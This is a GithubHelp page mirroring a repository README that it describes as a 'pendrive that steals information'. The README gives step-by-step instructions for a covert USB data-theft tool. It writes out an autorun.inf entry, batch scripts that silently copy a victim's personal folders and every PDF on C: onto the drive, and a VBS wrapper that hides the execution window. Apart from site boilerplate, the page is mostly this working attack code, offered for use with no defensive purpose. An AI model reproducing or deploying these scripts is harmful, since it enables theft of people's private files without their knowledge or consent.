GithubHelp home page GithubHelp logo

copy_files's Introduction

Copy_FIles

pendrive that steals information Step 1: Materials Needed 1.USB Pendrive 8 GB or more

Step 2: Create Autorun File(autorun.inf) [autorun] icon=drive.ico open=vamokivamo.bat Action=Press ENTER to continue shell\open\command=vamokivamo.bat

Step 3: Make the File for Copy(.chupacabra.bat) @echo off :: variables SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y echo off %backupcmd% "%USERPROFILE%\pictures" "%drive%\copy\pics" %backupcmd% "%USERPROFILE%\Favorites" "%drive%\copy\Favorites" %backupcmd% "%USERPROFILE%\videos" "%drive%\copy\vids" %backupcmd% "%USERPROFILE%\Download" "%drive%\copy\Download" %backupcmd% "%USERPROFILE%\Desktop" "%drive%\copy\Desktop" %backupcmd% "%USERPROFILE%\Music" "%drive%\copy\Music" %backupcmd% "%USERPROFILE%\Documents" "%drive%\copy\Documents" @echo off cls

Step 3.1: Make the Copy PDF files(.chupacabrapdf.bat) @echo off :: variables SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y echo off for /r C:\ %%x in (*.pdf) do xcopy %%x "%drive%\copy" @echo off cls

Step 4: Make a Script to hide other files(invisible.vbs) CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Step 5: Make a Batch File(vamokivamo.bat) wscript.exe \invisible.vbs .chupacabra.bat

Step 6: Create Directory copy

Step 7: Put All Files in the Pen Root

copy_files's People

Contributors

complex-u avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.